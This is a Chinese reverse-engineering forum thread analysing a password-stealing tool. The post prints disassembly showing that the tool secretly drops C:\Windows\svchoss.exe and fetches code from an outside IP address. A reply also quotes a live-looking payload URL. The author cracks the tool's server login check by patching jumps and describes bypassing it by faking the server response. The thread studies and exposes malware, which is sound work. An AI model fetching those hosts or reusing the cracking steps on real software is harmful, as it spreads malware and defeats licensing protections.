吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 7606|回复: 59
上一主题 下一主题
收起左侧

[原创] 记录对某盗号软件一次分析报告!

  [复制链接]
跳转到指定楼层
楼主
夜陌 发表于 2021-2-2 14:55 回帖奖励
本帖最后由 夜陌 于 2021-2-2 15:12 编辑

记录对某盗号软件一次分析报告!
好久没更新东西了,最近一直在忙没怎么看消息,这次事情原由是 “娱乐圈黑客”,跑到我群里刷广告


然后我就加群

震惊,,,我点进去一看 我以为都是他写的工具 一看,,

放肆,我是读春秋的,你怎么能放这些 内容?

我先替你们看一下 !!你们别学坏敖!然后 看了一下工具

然后丢尽od 开始 跑起来 分析的时候
不是吧,2021还有人玩这个 ?开始看了一眼 没仔细研究 是自写验证 正准备不耐烦关闭程序调试的时候 我在底部看到这个动作!
0040AECA  /$  55            push ebp
0040AECB  |.  8BEC          mov ebp,esp
0040AECD  |.  81EC 0C000000 sub esp,0xC
0040AED3  |.  C745 FC 00000>mov [local.1],0x0
0040AEDA  |.  6A 01         push 0x1
0040AEDC  |.  68 02000000   push 0x2
0040AEE1  |.  6A 01         push 0x1
0040AEE3  |.  68 02000000   push 0x2
0040AEE8  |.  E8 4B010000   call 客户端.0040B038
0040AEED  |.  68 04000080   push 0x80000004
0040AEF2  |.  6A 00         push 0x0
0040AEF4  |.  68 9B60C601   push 客户端.01C6609B                        ;  svchoss.exe
0040AEF9  |.  68 01000000   push 0x1
0040AEFE  |.  B8 02000000   mov eax,0x2
0040AF03  |.  BB A0E84A00   mov ebx,<客户端.未知命令>
0040AF08  |.  E8 25380300   call 客户端.0043E732                        ;  jmp 到 <客户端.三方支持库命令>
0040AF0D  |.  83C4 10       add esp,0x10
0040AF10  |.  68 04000080   push 0x80000004
0040AF15  |.  6A 00         push 0x0
0040AF17  |.  68 A760C601   push 客户端.01C660A7                        ;  C:\Windows\svchoss.exe
0040AF1C  |.  68 01000000   push 0x1
0040AF21  |.  BB 20074400   mov ebx,客户端.00440720
0040AF26  |.  E8 E9370300   call 客户端.0043E714                        ;  jmp 到 <客户端.核心支持库命令>
0040AF2B  |.  83C4 10       add esp,0x10
0040AF2E  |.  68 04000080   push 0x80000004
0040AF33  |.  6A 00         push 0x0
0040AF35  |.  68 BE60C601   push 客户端.01C660BE                        ;  http://23.224.244.121/wtr.txt
0040AF3A  |.  68 01000000   push 0x1
0040AF3F  |.  B8 0B000000   mov eax,0xB
0040AF44  |.  BB A0AB4C00   mov ebx,客户端.004CABA0
0040AF49  |.  E8 E4370300   call 客户端.0043E732                        ;  jmp 到 <客户端.三方支持库命令>
0040AF4E  |.  83C4 10       add esp,0x10
0040AF51  |.  8945 F8       mov [local.2],eax
0040AF54  |.  68 05000080   push 0x80000005
0040AF59  |.  6A 00         push 0x0
0040AF5B  |.  8B45 F8       mov eax,[local.2]
0040AF5E  |.  85C0          test eax,eax
0040AF60  |.  75 05         jnz short 客户端.0040AF67
0040AF62  |.  B8 2E60BD01   mov eax,客户端.01BD602E
0040AF67  |>  50            push eax
0040AF68  |.  68 01000000   push 0x1
0040AF6D  |.  BB 10044400   mov ebx,客户端.00440410
0040AF72  |.  E8 9D370300   call 客户端.0043E714                        ;  jmp 到 <客户端.核心支持库命令>
0040AF77  |.  83C4 10       add esp,0x10
0040AF7A  |.  8945 F4       mov [local.3],eax
0040AF7D  |.  8B5D F8       mov ebx,[local.2]
0040AF80  |.  85DB          test ebx,ebx
0040AF82  |.  74 09         je short 客户端.0040AF8D
0040AF84  |.  53            push ebx
0040AF85  |.  E8 A2370300   call 客户端.0043E72C                        ;  jmp 到 <客户端.释放内存>
0040AF8A  |.  83C4 04       add esp,0x4
0040AF8D  |>  8B45 F4       mov eax,[local.3]                        ;  KernelBa.75201425
0040AF90  |.  50            push eax
0040AF91  |.  8B5D FC       mov ebx,[local.1]
0040AF94  |.  85DB          test ebx,ebx
0040AF96  |.  74 09         je short 客户端.0040AFA1
0040AF98  |.  53            push ebx
0040AF99  |.  E8 8E370300   call 客户端.0043E72C                        ;  jmp 到 <客户端.释放内存>
0040AF9E  |.  83C4 04       add esp,0x4
0040AFA1  |>  58            pop eax                                  ;  ntdll.76E26A04
0040AFA2  |.  8945 FC       mov [local.1],eax
0040AFA5  |.  B8 A760C601   mov eax,客户端.01C660A7                     ;  C:\Windows\svchoss.exe
0040AFAA  |.  8945 F8       mov [local.2],eax
0040AFAD  |.  8D45 F8       lea eax,[local.2]
0040AFB0  |.  50            push eax
0040AFB1  |.  8D45 FC       lea eax,[local.1]
0040AFB4  |.  50            push eax
0040AFB5  |.  E8 6E020000   call 客户端.0040B228
0040AFBA  |.  8B5D F8       mov ebx,[local.2]
0040AFBD  |.  85DB          test ebx,ebx
0040AFBF  |.  74 09         je short 客户端.0040AFCA

看到以上内容 可以看得出来 这个孩子  C Windows 释放出svchoss.exe ,
老油条肯定知道 这孩子 是在干嘛 ,牛皮 ,本来玩盗号 就是缺德事情,这孩子竟然玩黑吃黑 有头脑。
我已经在监狱替你留了一个房间! 然后就顺手开始 分析爆破过程吧!
下个标配三连 断点,MessageBeep ,MessageBoxAMessageBoxExa 我们在错误断点  上面retn pop 头部 下个断点!
断下来之后  单步下去 看他在 干嘛


不用多说这里吧,在 链接验证地址!
0040F63E  |.  E8 F5F00200   call 客户端.0043E738                        ;  获取账号
0040F643  |.  83C4 10       add esp,0x10
0040F646  |.  8945 F0       mov [local.4],eax
0040F649  |.  FF35 38F8CF02 push dword ptr ds:[0x2CFF838]            ;  388392
0040F64F  |.  68 6FBFC701   push 客户端.01C7BF6F                        ;  &Guid=
0040F654  |.  FF75 F0       push [local.4]
0040F657  |.  68 A0BEC701   push 客户端.01C7BEA0                        ;  &pwd=
0040F65C  |.  FF75 F4       push [local.3]
0040F65F  |.  68 2361C601   push 客户端.01C66123                        ;  name=
0040F664  |.  B9 06000000   mov ecx,0x6
0040F669  |.  E8 A31BFFFF   call 客户端.00401211

这段呢 就是获取账号密码 ,也不用多研究!



这里呢 就是链接发包 就不用继续看了 继续F8



这里这个call呢 就是返回 关键点 就在 这里,返回了一个-2 我们在看字串 对比

账号密码错误 也就明白 返回-2 是嘛 意思,ok  这里就是我们要分析的核心了  ,重新运行一次 下个断点 在这个call 断下来 之后 call 一步步寻找  对比 这是个很烦躁的过程!
进去之后 我们就到了易语言的核心支持库 然后 在这里他会发包

费劲 继续 一直发包 然后返回出数组出来 这在他服务器做校验 没法呀,真当难搞的时候 想起来 正常程序都是 登录失败 附近肯定有登录成功!于是我翻了翻下面 有个东西 引起我的注意
0040FAD2  |> \68 02000080   push 0x80000002
0040FAD7  |.  6A 00         push 0x0
0040FAD9  |.  68 00000000   push 0x0
0040FADE  |.  6A 00         push 0x0
0040FAE0  |.  6A 00         push 0x0
0040FAE2  |.  6A 00         push 0x0
0040FAE4  |.  68 04000080   push 0x80000004
0040FAE9  |.  6A 00         push 0x0
0040FAEB  |.  68 E1BFC701   push 客户端.01C7BFE1                        ;  |1
0040FAF0  |.  68 04000080   push 0x80000004
0040FAF5  |.  6A 00         push 0x0
0040FAF7  |.  8B45 FC       mov eax,[local.1]
0040FAFA  |.  85C0          test eax,eax

其他都是负数 而这个是正的 是不是就是登录成功呢 ? 于是我将jnz改成 jmp 跳到这里

0040F808     /E9 C5020000   jmp 客户端.0040FAD2
0040F80D     |90            nop
0040F80E     |90            nop
0040F80F     |90            nop
0040F810  |. |6A 00         push 0x0
0040F812  |. |6A 00         push 0x0
0040F814  |. |68 04000080   push 0x80000004
0040F819  |. |6A 00         push 0x0
0040F81B  |. |68 76BFC701   push 客户端.01C7BF76                        ;  提示
0040F820  |. |68 01030080   push 0x80000301
0040F825  |. |6A 00         push 0x0
0040F827  |. |68 00000000   push 0x0
0040F82C  |. |68 04000080   push 0x80000004
0040F831  |. |6A 00         push 0x0
0040F833  |. |68 7BBFC701   push 客户端.01C7BF7B                        ;  帐号密码格式不正确



这里的cmp 需要注意了 cmp 0x1 这里应该是 如果1成立 je将不会执行他下面代码 所以 我们需要改成0


然后 成功爆破进来,林北,赛林母寄卖 !(懂的人 自然懂!) 然后 没什么卵用,一看就是开源程序改的 (这很黑客!) 其实还有一种更简单的破解方式,就是用抓包软件 把返回包 改成 1  这个特征 就可以直接破解!我对这玩意儿没兴趣,本来搞别人号就是缺德事,在加上这还黑吃黑 这孩子 厉害 厉害! 最后说一句,网络不是法外之地,劝孩子 趁早收手!

有程序的 直接私信发下载地址,抽空我会挑继续分享教程给你们!然后 回复本贴发言  有福利 你信么?

免费评分

参与人数 15吾爱币 +16 热心值 +14 收起 理由
jay20070223 + 1 + 1 应该说 林北,赛林木机枪
苏叔 + 1 + 1 我很赞同!
TMxiaoxiu + 1 + 1 我很赞同!
绝地飞鸿 + 2 + 1 这尼玛有点意思
木子汐 + 1 + 1 我很赞同!
GuLiGuLi + 1 + 1 谢谢@Thanks!
RA_ASheng + 1 + 1 谢谢@Thanks!
最佳第六人 + 1 + 1 我很赞同!
WAlitudealiy + 1 + 1 谢谢@Thanks!
xmt_Gcc + 1 + 1 谢谢@Thanks!
hitman王 + 1 我很赞同!
fengbolee + 1 + 1 用心讨论,共获提升!
lawry + 1 + 1 我很赞同!
wangergoubk + 1 + 1 有点意思~
杨辣子 + 1 + 1 有点意思~

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
xian54966 发表于 2021-2-2 15:52
小图 发表于 2021-2-2 15:27
大佬  我运行他代码里的  http://103.45.185.103:949/111.exe   会怎么样啊  没事吧

默默的传到Virscan了,等他更新吧。
推荐
小图 发表于 2021-2-2 15:27
沙发
呵呵我笑了 发表于 2021-2-2 14:59
3#
FANGWJ 发表于 2021-2-2 15:00
学习了新的技术
感觉大佬分享学习
4#
arq2020 发表于 2021-2-2 15:02
谢谢楼主,最好排一下版
5#
沉心云 发表于 2021-2-2 15:02
大佬果然是大佬,但是你的排版看的眼睛酸痛啊
6#
JuncoJet 发表于 2021-2-2 15:07
欺骗密码吧,程序方面无亮点
7#
 楼主| 夜陌 发表于 2021-2-2 15:08 |楼主
因为用的 word写的  然后直接复制进来 所以 乱了 一点  尽量吧
8#
abondon 发表于 2021-2-2 15:20
大佬大佬,OD我都没学会
9#
小望舒的猫 发表于 2021-2-2 15:23
不说啥话了。大佬牛皮。收下我的膝盖
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-25 13:04

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表